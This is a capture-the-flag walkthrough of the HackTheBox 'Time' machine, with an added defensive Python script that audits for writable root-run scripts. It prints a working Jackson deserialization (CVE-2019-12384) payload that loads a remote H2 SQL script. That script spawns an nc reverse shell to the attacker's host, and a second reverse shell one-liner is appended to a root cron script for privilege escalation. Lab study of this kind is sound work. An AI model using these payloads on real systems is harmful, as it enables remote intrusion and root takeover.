Time HackTheBox WalkThrough

This is a walkthrough of the Time HackTheBox machine. In this writeup I demonstrate step by step how I rooted the Time HTB machine. Before starting, a few facts about the machine: it is a Linux box with IP address 10.10.10.214 and difficulty medium, as assigned by its maker.
First, connect your PC to the VPN and confirm connectivity to the Time machine by pinging its IP 10.10.10.214. If that works, it is time to start hacking. As usual, I began by scanning the machine. Scanning gives us an idea of how to proceed: it helps with banner grabbing of the services running on the different ports, and sometimes with vulnerability scanning too. I used nmap for scanning; the result is given below:
Scanning
$ nmap -sC -sV -oN time.nmap 10.10.10.214

Nmap revealed that ports 22 and 80 are open: OpenSSH on port 22 and an Apache2 web server on port 80. Since Apache2 is running on port 80, there must be a website hosted on this server, reachable at http://10.10.10.214:80 or simply http://10.10.10.214. Going to this URL showed that the website is for beautifying and validating JSON (JavaScript Object Notation).

I tried validating and beautifying some sample JSON documents from the internet and it worked fine. But when I submitted an XSS payload (just for testing) it returned a validation error. The validation error reveals that this website uses the Jackson library for JSON deserialization (deserialization is converting JSON text back into program objects).
As soon as I knew the Jackson library was in use, I googled for Jackson library vulnerabilities and found this link, and then CVE-2019-12384, on the very first page. According to that article, applications that use the Jackson library for JSON deserialization were affected by a deserialization vulnerability in which an attacker could control the class to be deserialized. Read the blog above to understand how this vulnerability actually works and how to reproduce it. Another PoC of this vulnerability can be found on GitHub.
Getting User Shell
After finding the steps on GitHub, I did the following to exploit this vulnerability.
1. Created a file named inject.sql and put the following content into it.
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {String[] command = {"bash", "-c", cmd};java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");return s.hasNext() ? s.next() : ""; }$$;CALL SHELLEXEC('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f')
$ cat inject.sql

Replace the IP address in the SHELLEXEC() call on the last line of the above code with your own.
2. Started a Python HTTP server to host this file.
3. Started a netcat listener on port 1234 in another window.
4. Entered the following code in the input field of the website after choosing the option Validate (beta), then clicked the PROCESS button.
["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url": "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http:\/\/10.10.14.10:80\/inject.sql'"}]
The above code is in its beautified form; you can also use its raw form to get the reverse shell.
Start Python HttpServer
$ sudo python3 -m http.server 80
Start Netcat Listener
$ nc -nvlp 1234
$ whoami && id

We got a user shell. Let us upgrade it to a fully interactive Linux shell so that we can run more advanced Linux commands through it.
Upgrading Shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
$ CTRL+Z        // To background the shell
$ stty raw -echo
$ fg            // To foreground the shell, then press Enter twice

Capture User Flag
$ cat /home/pericles/user.txt

Privilege Escalation
To escalate privileges to root we first have to find a privilege escalation vector. For this I ran linpeas.sh (a post-exploitation enumeration script) on the Time machine. It reports all potential vectors that could be used to escalate privileges to root.
Finding PrivEsc Vector
Linpeas found a script timer_backup.sh inside the directory /usr/bin/ which is writable by a normal user.

I confirmed this by checking its permissions, to rule out a false positive.
$ ls -la /usr/bin/timer_backup.sh

Its permissions are rwx (readable, writable and executable) for user pericles. But when I tried to execute this script I got permission denied. One thing is clear: this script is meant to be executed by the root user, and everything inside the file then runs with root privileges. So if we introduce our reverse shell payload into this file, it will also be executed with root privileges and we get a root shell. I did exactly that and easily got a root shell. So here our PrivEsc vector is exploitation of unwanted file permissions given to a normal user.
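An added example, not from the original writeup: a Python audit that performs the same check as the ls -la above across whole system script directories, flagging regular files a non-root user could modify (world-writable, writable by a non-root group, or owned by a non-root UID, as timer_backup.sh was). The directory list and the trusted_uids parameter are my assumptions.

```python
import stat
from pathlib import Path

# Directories a root-run cron job or systemd timer typically executes scripts from.
# Assumed list for illustration; extend it for your distribution.
SYSTEM_SCRIPT_DIRS = ("/usr/bin", "/usr/sbin", "/usr/local/bin", "/etc/cron.d")


def audit_writable_scripts(dirs=SYSTEM_SCRIPT_DIRS, trusted_uids=(0,)):
    """Return sorted [(path, reason), ...] for regular files a non-root user could modify.

    A file is reported when it is world-writable, writable by a non-root group,
    or owned by a UID outside trusted_uids. The last case is what this walkthrough
    found: /usr/bin/timer_backup.sh owned by a normal user but executed by root.
    """
    findings = []
    for d in dirs:
        base = Path(d)
        if not base.is_dir():
            continue
        for p in base.iterdir():
            try:
                st = p.lstat()  # lstat: do not follow symlinks out of the directory
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue  # directories, sockets and symlinks are not script bodies
            reasons = []
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
                reasons.append(f"writable by non-root group gid={st.st_gid}")
            if st.st_uid not in trusted_uids:
                reasons.append(f"owned by uid={st.st_uid}")
            if reasons:
                findings.append((str(p), ", ".join(reasons)))
    return sorted(findings)


if __name__ == "__main__":
    for path, reason in audit_writable_scripts():
        print(f"{path}: {reason}")
```

Running this from a root cron job of its own and alerting on any non-empty result catches the misconfiguration before an attacker with a user shell does.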
Getting Root Shell
To get a root shell I did the following:
1. Started a netcat listener in one window.
2. Appended our reverse shell payload to the file timer_backup.sh (since a normal user can modify this file).
This script is executed by root at a regular interval (I think every 5-10 seconds; I don't know exactly, but in my case the gap was about 5-10 seconds). The next time it runs it will also execute our reverse shell code and we get a root shell.
On Kali Machine
$ nc -nvlp 4321
On Time Machine
$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 4321 >/tmp/f' >>/usr/bin/timer_backup.sh

We are root now. Let’s capture root flag.
Capture Root Flag
$ cat /root/root.txt

This was how I rooted the Time HackTheBox machine. I learnt a lot during this challenge and hope you have learnt something new too. Thanks for reading this walkthrough. Share your experience in the comment section. If you want to give any suggestions about the writeup, feel free to write to us at [email protected]. Check out our latest walkthroughs at https://ethicalhacs.com/ .